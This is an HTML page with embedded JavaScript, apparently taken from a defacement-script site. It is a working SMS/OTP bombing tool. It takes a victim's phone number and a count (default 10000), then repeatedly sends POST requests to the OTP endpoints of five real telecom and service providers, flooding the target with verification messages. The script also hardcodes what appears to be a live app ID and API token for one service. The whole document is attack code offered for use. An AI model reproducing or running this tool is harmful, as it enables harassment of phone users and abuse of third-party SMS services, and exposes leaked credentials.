<!--
--  Downloaded from : https://haxor.my.id/save/boom81.html
--  Official Web : https://prinsh.com
--  script-deface-generator.prinsh.com
-->
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Send OTP Requests</title>
    <style>
        body {
            background-image: url('https://i.ibb.co/gVdR4xW/file-46.jpg'); /* Replace with your image URL */
            background-size: cover;
            background-position: center;
            color: white;
            font-family: Arial, sans-serif;
            text-align: center;
            padding-top: 50px;
        }
        .input-box {
            margin: 20px;
        }
        .number-input, .amount-input {
            background-color: gray;
            padding: 10px;
            font-size: 16px;
            border: none;
            border-radius: 5px;
            color: black;
        }
        button {
            padding: 10px 20px;
            font-size: 16px;
            background-color: white;
            color: red;
            border: none;
            border-radius: 5px;
            cursor: pointer;
        }
        button:hover {
            background-color: #ddd;
        }
        .response {
            margin-top: 30px;
            color: yellow;
        }
    </style>
</head>
<body>

    <h1>Send OTP Requests</h1>

    <div class="input-box">
        <input type="text" id="number" class="number-input" placeholder="Enter Phone Number">
    </div>

    <div class="input-box">
        <input type="number" id="amount" class="amount-input" placeholder="Enter Amount" value="10000">
    </div>

    <button onclick="sendRequests()">Send Requests</button>

    <div id="response" class="response"></div>

    <audio id="background-music" src="https://j.top4top.net/m_1143lxvsq2.mp3"></audio> <!-- Replace with your music file -->

    <script>
        function sendRequests() {
            let number = document.getElementById('number').value;
            let amount = document.getElementById('amount').value;
            let responseDiv = document.getElementById('response');
            let backgroundMusic = document.getElementById('background-music');

            if (!number || amount < 1) {
                alert("Please enter a valid number and amount!");
                return;
            }

            // Play background music
            backgroundMusic.play();

            responseDiv.innerHTML = "Sending requests...";

            let requests = [
                {
                    url: 'https://weblogin.grameenphone.com/backend/api/v1/otp',
                    data: { msisdn: number }
                },
                {
                    url: 'https://eshop-api.banglalink.net/api/v1/customer/send-otp',
                    data: { type: "phone", phone: number }
                },
                {
                    url: 'https://accountkit.sheba.xyz/api/shoot-otp',
                    data: {
                        mobile: "+62" + number,
                        app_id: "8329815A6D1AE6DD",
                        api_token: "eZj4kBuPKozhLzTAEP8zQCbVI4NdAWzA5SkBW9lZQGGyhXXCuudPmZcqLlmY"
                    }
                },
                {
                    url: 'https://developer.quizgiri.xyz/api/v2.0/send-otp',
                    data: {
                        phone: number,
                        country_code: "+62",
                        fcm_token: null
                    }
                },
                {
                    url: 'https://gw.jotno.net/auth/login/token',
                    data: {
                        userType: "CONSUMER",
                        username: number
                    }
                }
            ];

            // Send requests in loop
            for (let i = 0; i < amount; i++) {
                requests.forEach((request) => {
                    fetch(request.url, {
                        method: 'POST',
                        headers: {
                            'Content-Type': 'application/json'
                        },
                        body: JSON.stringify(request.data)
                    })
                    .then(response => response.json())
                    .then(data => {
                        console.log(`Response for request ${i+1}:`, data);
                        responseDiv.innerHTML = `Sent ${i+1}/${amount} requests`;
                    })
                    .catch(error => {
                        console.error('Error:', error);
                    });
                });
            }
        }
    </script>

</body>
</html>